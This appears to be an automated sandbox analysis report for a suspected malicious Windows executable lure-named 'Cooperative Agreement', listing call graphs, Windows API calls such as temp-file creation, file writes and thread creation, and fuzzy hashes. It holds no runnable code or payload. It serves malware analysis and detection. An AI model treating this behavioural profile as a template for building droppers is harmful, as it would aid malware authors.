API calls 9690->9691 9692 4014ed 9691->9692 9693 40dd1d 2 API calls 9692->9693 9694 4014f6 9693->9694 9694->9615 9694->9616 9696 40dfc0 21 API calls 9695->9696 9697 40470d 9696->9697 9698 405060 2 API calls 9697->9698 9699 404719 9698->9699 9700 40472c 9699->9700 9735 40249b 9699->9735 9709 40473d 9700->9709 9744 40acd0 9700->9744 9703 40df50 HeapFree 9704 403d71 9703->9704 9710 409b80 HeapFree 9704->9710 9705 40474f 9706 40478f 9705->9706 9705->9709 9755 40afb0 9705->9755 9708 40a9d0 11 API calls 9706->9708 9708->9709 9709->9703 9710->9627 9711->9622 9712->9628 9714 409cd0 9713->9714 9717 409d28 9713->9717 9715 40e260 3 API calls 9714->9715 9716 409cf9 9715->9716 9802 40e3f0 TlsGetValue 9716->9802 9718 409d83 MultiByteToWideChar 9717->9718 9720 40e260 3 API calls 9718->9720 9722 409da0 MultiByteToWideChar 9720->9722 9721 409d1d 9721->9630 9722->9630 9723->9601 9724->9606 9725->9614 9726->9614 9728 405710 WideCharToMultiByte 9727->9728 9729 40570b 9727->9729 9730 409ba0 RtlAllocateHeap 9728->9730 9729->9728 9731 405730 9730->9731 9732 405736 WideCharToMultiByte 9731->9732 9733 401207 9731->9733 9732->9733 9733->9677 9734->9688 9736 405060 2 API calls 9735->9736 9737 4024ac 9736->9737 9766 40ada0 9737->9766 9740 4024d3 9742 40df50 HeapFree 9740->9742 9741 40a9d0 11 API calls 9741->9740 9743 4024eb 9742->9743 9743->9700 9745 40d498 5 API calls 9744->9745 9746 40ace5 9745->9746 9747 40ad97 9746->9747 9748 40acef CreateFileW 9746->9748 9747->9705 9749 40ad10 CreateFileW 9748->9749 9750 40ad2c 9748->9750 9749->9750 9751 40ad4d 9749->9751 9750->9751 9752 40ad39 HeapAlloc 9750->9752 9753 40d40a 4 API calls 9751->9753 9754 40ad8e 9751->9754 9752->9751 9753->9754 9754->9705 9756 40afc2 9755->9756 9757 40b015 9755->9757 9758 40b00d 9756->9758 9759 40d459 2 API calls 9756->9759 9757->9706 9758->9706 9760 40afda 9759->9760 9761 40b003 9760->9761 9762 40aff2 WriteFile 9760->9762 9763 40afe4 9760->9763 9761->9706 9762->9761 9791 40b020 9763->9791 9765 40afec 9765->9706 9769 40aac0 9766->9769 9768 4024bf 9768->9740 9768->9741 9770 40aad8 9769->9770 9771 40d498 5 API calls 9770->9771 9772 40aaef 9771->9772 9773 40aca2 9772->9773 9774 40ab02 9772->9774 9775 40ab3e 9772->9775 9773->9768 9777 40ab19 9774->9777 9778 40ab1c CreateFileW 9774->9778 9776 40ab43 9775->9776 9781 40ab7c 9775->9781 9779 40ab5a 9776->9779 9780 40ab5d CreateFileW 9776->9780 9777->9778 9785 40abe8 9778->9785 9779->9780 9780->9785 9782 40aba7 CreateFileW 9781->9782 9781->9785 9784 40abc9 CreateFileW 9782->9784 9782->9785 9783 40ac70 9787 40d40a 4 API calls 9783->9787 9790 40ac81 9783->9790 9784->9785 9785->9783 9786 40ac22 9785->9786 9788 40ac0e HeapAlloc 9785->9788 9786->9783 9789 40ac5c SetFilePointer 9786->9789 9787->9773 9788->9786 9789->9783 9790->9768 9792 40b127 9791->9792 9793 40b03a 9791->9793 9792->9765 9794 40b040 SetFilePointer 9793->9794 9795 40b06b 9793->9795 9794->9795 9797 40aa40 WriteFile 9795->9797 9799 40b077 9795->9799 9796 40b0a7 9796->9765 9798 40b0ee 9797->9798 9798->9799 9800 40b0f5 WriteFile 9798->9800 9799->9796 9801 40b091 memcpy 9799->9801 9800->9765 9801->9765 9802->9721 9804 40631f 9803->9804 9805 406438 9804->9805 9816 4063ae 9804->9816 9806 40e1e0 TlsGetValue 9805->9806 9808 406442 9806->9808 9807 40660a 9807->9646 9809 40645a 9808->9809 9810 40644a _wcsdup 9808->9810 9811 40e1e0 TlsGetValue 9809->9811 9810->9809 9812 406460 9811->9812 9813 406477 9812->9813 9814 406468 _wcsdup 9812->9814 9815 40e1e0 TlsGetValue 9813->9815 9814->9813 9817 406480 9815->9817 9816->9807 9818 4063fc wcsncpy 9816->9818 9820 40642e 9816->9820 9819 406488 _wcsdup 9817->9819 9822 406498 9817->9822 9818->9816 9819->9822 9820->9646 9821 40e260 3 API calls 9823 406520 9821->9823 9822->9821 9824 406572 wcsncpy 9823->9824 9825 406526 9823->9825 9828 40658d 9823->9828 9824->9828 9826 4065e4 9825->9826 9827 4065db free 9825->9827 9829 4065f7 9826->9829 9830 4065eb free 9826->9830 9827->9826 9828->9825 9832 406625 wcsncpy 9828->9832 9829->9807 9831 4065fe free 9829->9831 9830->9829 9831->9807 9832->9828 9834 40aac0 15 API calls 9833->9834 9835 40243f 9834->9835 9835->9666 9836 40af80 9835->9836 9837 40d459 2 API calls 9836->9837 9838 40af8f 9837->9838 9839 40afa3 9838->9839 9842 40ae80 9838->9842 9839->9664 9841 40afa0 9841->9664 9843 40af74 9842->9843 9844 40ae94 9842->9844 9843->9841 9844->9843 9845 40aea8 9844->9845 9846 40af0d 9844->9846 9848 40aee0 9845->9848 9849 40aeb8 9845->9849 9860 40b130 WideCharToMultiByte 9846->9860 9848->9848 9850 40aeeb WriteFile 9848->9850 9853 40b020 4 API calls 9849->9853 9850->9841 9851 40af27 9852 40af6b 9851->9852 9854 40af37 9851->9854 9855 40af48 WriteFile 9851->9855 9852->9841 9856 40aeda 9853->9856 9857 40b020 4 API calls 9854->9857 9858 40af5c HeapFree 9855->9858 9856->9841 9859 40af42 9857->9859 9858->9852 9859->9858 9861 40b155 HeapAlloc 9860->9861 9862 40b18e 9860->9862 9863 40b189 9861->9863 9864 40b16c WideCharToMultiByte 9861->9864 9862->9851 9863->9851 9864->9863 10167->7796 10168->7798 10169->7800 10170->7802 10171->7806 10172->7812 10173->7814 10174->7816 10175->7818 10176->7822 10177->7830 10178->7836 10179->7838 10180->7845 10181->7847 10182->7849 10183->7851 10184->7855 10185->7861 10186->7863 10187->7865 10188->7867 10189->7871 10190->7877 10191->7883 10192->7889 10193->7891 10194->7897 10195->7903 10453 406289 10454 406290 10453->10454 10454->10454 10457 40e3f0 TlsGetValue 10454->10457 10456 4062b5 10457->10456 10196 40b020 10197 40b127 10196->10197 10198 40b03a 10196->10198 10199 40b040 SetFilePointer 10198->10199 10200 40b06b 10198->10200 10199->10200 10202 40aa40 WriteFile 10200->10202 10204 40b077 10200->10204 10201 40b0a7 10203 40b0ee 10202->10203 10203->10204 10205 40b0f5 WriteFile 10203->10205 10204->10201 10206 40b091 memcpy 10204->10206 10616 401f3b 10617 40dfc0 21 API calls 10616->10617 10618 401f43 10617->10618 10639 40de80 GetLastError TlsGetValue SetLastError 10618->10639 10620 401f49 10640 40de80 GetLastError TlsGetValue SetLastError 10620->10640 10622 401f5a 10623 40e020 4 API calls 10622->10623 10624 401f62 10623->10624 10641 40de80 GetLastError TlsGetValue SetLastError 10624->10641 10626 401f68 10642 40de80 GetLastError TlsGetValue SetLastError 10626->10642 10628 401f70 10643 409b10 10628->10643 10632 401f7d 10647 405182 TlsGetValue 10632->10647 10634 401f88 10635 408e27 20 API calls 10634->10635 10636 401f91 10635->10636 10637 4051a0 3 API calls 10636->10637 10638 401f96 10637->10638 10638->10638 10639->10620 10640->10622 10641->10626 10642->10628 10648 409aa0 10643->10648 10646 40e080 TlsGetValue 10646->10632 10647->10634 10649 409ab0 10648->10649 10650 40e260 3 API calls 10649->10650 10651 401f77 10650->10651 10651->10646 10207 4011bf 10234 405379 EnterCriticalSection 10207->10234 10209 4011c4 10220 409950 SetUnhandledExceptionFilter 10209->10220 10211 4011c9 10221 40a6b5 10211->10221 10217 4011d8 10233 409b30 HeapDestroy 10217->10233 10219 4011dd 10220->10211 10222 4011ce 10221->10222 10223 40a6be 10221->10223 10225 40aa90 10222->10225 10224 40d9f5 2 API calls 10223->10224 10224->10222 10226 40d9f5 2 API calls 10225->10226 10227 4011d3 10226->10227 10228 40d2c4 10227->10228 10229 40d2d1 10228->10229 10230 40d2d2 10228->10230 10229->10217 10231 40d2e7 10230->10231 10232 40d2db TlsFree 10230->10232 10231->10217 10232->10231 10233->10219 10235 4053b2 LeaveCriticalSection 10234->10235 10236 40538f 10234->10236 10235->10209 10237 405390 CloseHandle 10236->10237 10239 4053b1 10236->10239 10238 40db32 HeapFree 10237->10238 10238->10236 10239->10235

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                                          • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02390000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
                                                                                                                                                                                                                                        • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                                                                                                                                                                                                        • String ID: GetLongPathNameW$Kernel32.DLL
                                                                                                                                                                                                                                        • API String ID: 820969696-2943376620
                                                                                                                                                                                                                                        • Opcode ID: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                                                                                                                                                                                                                        • Instruction ID: 045e3bd93f30ce5257affd3ba06db84d60efd2c3f80f990f00f7183b84a9fd71
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0F0BE722052147FC2212BBAAC4CDAB3E7CDE96752700413AF905E2252EA79881082BD

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
                                                                                                                                                                                                                                        • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
                                                                                                                                                                                                                                        • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                                                                                                                                                                                                                        • String ID: $pA$$pA$$pA$$pA
                                                                                                                                                                                                                                        • API String ID: 368575804-1531182785
                                                                                                                                                                                                                                        • Opcode ID: f2649a27bc67419c7da43eb2419df5a8acb945f1114a682675cf20ce32d935b4
                                                                                                                                                                                                                                        • Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2649a27bc67419c7da43eb2419df5a8acb945f1114a682675cf20ce32d935b4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040100F
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                                                                                                                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                                                                                                                                                                                                          • Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                                                                                                                                                                                                                          • Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                                                                                                                                                                                                                          • Part of subcall function 00409B40: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                                                                                                                                                                                                                          • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                                                                                                                                                                                                                                          • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                                                                                                                                                                                                                                          • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                                                                                                                                                                                                                          • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                                                                                                                                                                                                                                          • Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0
                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                                          • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                                                                                                                                                                                                                          • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                                                                                                                                                                                                                          • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                                                                                                                                                                                                                          • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
                                                                                                                                                                                                                                          • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
                                                                                                                                                                                                                                          • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B
                                                                                                                                                                                                                                          • Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
                                                                                                                                                                                                                                          • Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370
                                                                                                                                                                                                                                          • Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                                                                                                                                                                                                                          • Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                          • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                                                                                                                                                                                                                          • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                                                                                                                                                                                                                          • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011A5
                                                                                                                                                                                                                                        • HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonControlsDestroyEnumInitLoadModuleResourceTypes
                                                                                                                                                                                                                                        • String ID: .pA$:pA
                                                                                                                                                                                                                                        • API String ID: 3272620648-1142403416
                                                                                                                                                                                                                                        • Opcode ID: 2cb7c3423d8d5d08e17f4111cb8a79a384b104a5b6fb2f3686e5397f4b8265a8
                                                                                                                                                                                                                                        • Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cb7c3423d8d5d08e17f4111cb8a79a384b104a5b6fb2f3686e5397f4b8265a8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 145 403df3-403df4 146 403df9-403e04 145->146 146->146 147 403e06-403e1c call 40dfc0 146->147 150 403e1e-403e26 147->150 151 403e28-403e8a call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 150->151 152 403e8c-403e9d 150->152 151->150 151->152 153 403e9f-403ea7 152->153 156 403ea9-403f0b call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 153->156 157 403f0d-403f1e 153->157 156->153 156->157 160 403f20-403f28 157->160 163 403f2a-403f8c call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 160->163 164 403f8e-403f9f 160->164 163->160 163->164 168 403fa1-403fa9 164->168 172 403fab-40400d call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 168->172 173 40400f-404020 168->173 172->168 172->173 178 404022-40402a 173->178 183 404090-4040a1 178->183 184 40402c-40408e call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 178->184 190 4040a3-4040ab 183->190 184->178 184->183 196 404115-404126 190->196 197 4040ad-404113 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 190->197 204 404128-404130 196->204 197->190 197->196 205 404132-404190 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 204->205 206 40419a-4041ab 204->206 323 404195-404198 205->323 215 4041ad-4041b5 206->215 224 4041b7-40421d call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 215->224 225 40421f-404230 215->225 224->215 224->225 235 404232-40423a 225->235 245 4042a4-4044ef call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 403275 call 40dec0 call 40985e GetModuleHandleW call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 402e9d call 40de80 call 4021a4 call 4051a0 call 40195b call 40460e call 40de80 call 405100 call 40358d call 40dec0 PathRemoveBackslashW call 40213e call 40de80 * 2 call 402bfa call 40e080 call 405182 call 4098c0 call 4051a0 call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 401e55 call 40dec0 call 403855 call 40de80 call 40e020 call 40dec0 PathQuoteSpacesW call 40de80 call 40e020 * 3 call 40dec0 PathQuoteSpacesW 235->245 246 40423c-4042a2 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 235->246 437 4044f1-404507 call 405492 245->437 438 404509-40450d call 402ca9 245->438 246->235 246->245 323->204 323->206 441 404512-40460d call 40de80 * 2 call 40e020 * 3 call 40e080 call 40de80 * 2 call 40a7f5 call 40e080 call 40de80 call 40e020 * 2 call 405182 * 3 call 402022 call 4051a0 call 401fa9 call 40df50 * 10 437->441 438->441
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02399740,00000000,00000000), ref: 004042FB
                                                                                                                                                                                                                                        • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                                                                                                                                                                                                                          • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(02399740,02399740,00002710), ref: 00402C34
                                                                                                                                                                                                                                          • Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A
                                                                                                                                                                                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                                          • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02399740,02399740,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                                          • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02399740,02398D50,00000000,00000000), ref: 00401E8A
                                                                                                                                                                                                                                        • PathQuoteSpacesW.SHLWAPI(00000000,00000001,02398DC8,00000000,00000000,00000000,00000000,00000000,02399740,02398D50,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
                                                                                                                                                                                                                                        • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,02398DC8,00000000,00000000,00000000,00000000,00000000,02399740,02398D50), ref: 004044E1
                                                                                                                                                                                                                                          • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02399740), ref: 004054AB
                                                                                                                                                                                                                                          • Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                                                                                                                                                                                                                          • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
